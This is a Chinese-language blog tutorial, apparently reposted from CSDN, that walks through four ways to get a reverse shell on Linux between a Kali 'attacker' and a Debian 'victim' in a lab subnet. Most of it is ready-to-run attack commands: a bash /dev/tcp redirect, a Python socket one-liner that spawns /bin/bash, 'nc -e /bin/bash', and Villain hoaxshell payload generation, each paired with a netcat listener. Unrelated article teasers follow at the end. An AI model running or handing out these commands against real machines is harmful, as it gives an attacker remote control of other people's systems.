首页 > 系统相关 >2024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤

2024 同一个网段,反弹shell四种方法【linux版本】bash、python、nc、villian反弹shell图解步骤

时间:2024-11-13 13:43:25浏览次数:3  
标签:villian shell 网段 自定义 kali 攻击者 whoami 端口号

实验环境准备(同一个网段下,我是桥接的虚拟机)

一、bash反弹shell

二、python反弹shell

三、nc反弹shell

四、villain反弹shell


实验环境准备(同一个网段下,我是桥接的虚拟机)

      一台kali的linux(攻击者)

        一台centos7/debian[另一个linux](受害者)

一、bash反弹shell

注意:自定义的端口号需要保持一致哦

  1、kali(攻击者)运行命令

nc -lvp 自定义端口号

 

2、debian(受害者)运行命令

 bash -i >& /dev/tcp/攻击者主机的ip/自定义的端口号 0>&1

 

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

whoami

 

二、python反弹shell

注意:自定义的端口号需要保持一致哦

  1、kali(攻击者)运行命令

nc -lvp 自定义端口号

 

2、debian(受害者)运行命令

注意修改攻击者的ip和端口号

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('攻击者的主机ip',自定义的端口号));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

3、结果在kali这边输出,并且已经连接成功,我们可以执行whoami查看权限

whoami

三、nc反弹shell

 注意:自定义的端口号需要保持一致哦

  1、kali(攻击者)运行命令

nc -lvp 自定义端口号

 

2、debian(受害者)运行命令

nc -e /bin/bash 攻击者ip 自定义的端口号

3、结果在kali这边输出,(这个不回显)我们可以直接执行whoami查看权限

whoami

四、villain反弹shell

   1、kali(攻击者)运行命令

 ①运行villain,需要先安装哦

villain

②生成linux的payload命令复制灰色区域的文字到debian的命令行中

温馨提示:可以在villain中使用help generate查看windows的payload生成方法

generate payload=linux/hoaxshell/sh_curl lhost=eth0

2、debian(受害者)复制并运行刚才生成的payload命令

3、结果在kali这边输出

②我们查看上线的主机

sessions

②进入shell,shell session的英文编码id,控制一下debian(受害者)

shell sessionID

③whoami看一下权限 

whoami

标签:villian,shell,网段,自定义,kali,攻击者,whoami,端口号
From: https://blog.csdn.net/m0_47484034/article/details/143712826

相关文章

  • 使用 PowerShell 创建多个 .reg 文件进行分段(切片)并且能够在执行时按顺序合并并执行,我
    使用PowerShell创建多个.reg文件进行分段(切片)并且能够在执行时按顺序合并并执行,我们可以按照以下步骤进行:目标:将一个大的 .reg 文件分割成多个小文件。每个小文件(分段)都将是一个有效的 .reg 文件,可以独立执行。使用PowerShell自动生成这些分段 .reg 文件,并执行它......
  • 检查电脑的 .net framework 的版本(复制到powershell里执行)
    打开powershell,$release=Get-ItemPropertyValue-LiteralPath'HKLM:SOFTWARE\Microsoft\NETFrameworkSetup\NDP\v4\Full'-NameReleaseswitch($release){{$_-ge533320}{$version='4.8.1orlater';break}{$_-ge52......
  • PowerShell 重命名文件夹及删除空文件夹
    数据来源$urldata中的倒数第2列(子文件夹名称列)包含/、\等特殊字符某个文件夹重命名脚本foreach($iin0..100){#提取路径部分$basePath=($urldata[$i].split("`t")[-1]).trim()$subPath=($urldata[$i].split("`t")[-2].replace('"','')......
  • 华为交换机使用高级ACL限制不同网段的用户互访案例
    1.组网需求如下图网络拓扑,某公司通过交换机LSW1实现各部门之间的互连。为方便管理网络,管理员为公司的研发部和市场部规划了两个网段的IP地址。同时为了隔离广播域,又将两个部门划分在不同VLAN之中。现要求LSW1既能够限制两个网段之间互访,又不影响两个部门访问外网。2.配置思......
  • Linux 关机的shell脚本
    今天突发奇想想写一个关机的脚本然后去找了很多帖子发现写的都不是很详细就打算自己写一个比较详细的:首先用vim编辑器先创建一个脚本文件(我是在桌面创建的)(也可以用其他文本编辑器不一定是vim):vimshutdown.sh然后就是在将以下内容输入至“shutdown.sh”中:#!/bin/bash......
  • Shell 教程
    1.Shell简介  Shell是一个用C语言编写的程序,它是用户使用Linux的桥梁。Shell既是一种命令语言,又是一种程序设计语言。Shell指一种应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。KenThompson的sh是第一种UnixShell,WindowsExplorer......
  • WireGuard 多节点集群的Shell 半自动化配置脚本
    要将上述WireGuard配置脚本扩展为支持 多节点集群(即多个服务器和客户端节点的配置),我们需要做出一些修改:支持多个 服务器 和 客户端 配置。自动为每个节点生成独特的配置文件,并确保它们能够互相通信。支持集群模式,配置多个 服务器端 和 客户端 节点之间的连接。以......
  • Xshell 7
    1Xshell7工具——更改用户数据文件夹就是此电脑目录下的文档该目录下的7Xshell下的applog ColorSchemeFiles 配色方案文件目录HighlightSetFiles 突出显示集目录Logs日志QuickButtonFiles 快速命令集Scripts 脚本文件Sessions 会话文件会话文件目......
  • shell脚本在linux无法运行
    shell脚本在linux无法运行在windows写的.sh脚本,直接把文件传到Linux之后运行,报错:$bash./v_1.sh:commandnotfound'/v_1.sh:line4:syntaxerrornearunexpectedtoken`do'/v_1.sh:line4:`do脚本内容是:#shellvirusI#forfilein./infect/*docp$0$fi......
  • SRE云计算运维之基础篇二:权限管理,VIM工具,文件查询及shell基础
    目录文件权限管理访问控制列表ACLVIM的使用及内容查询文本三剑客基本正则和扩展正则shell脚本之变量简单总结一下linux中的权限1.首先介绍一下关于linux中的用户:Linux中每个用户是通过UserId(UID)来唯一标识的,且Linux中可以将一个或多个用户加入用户组中,用户组是通过G......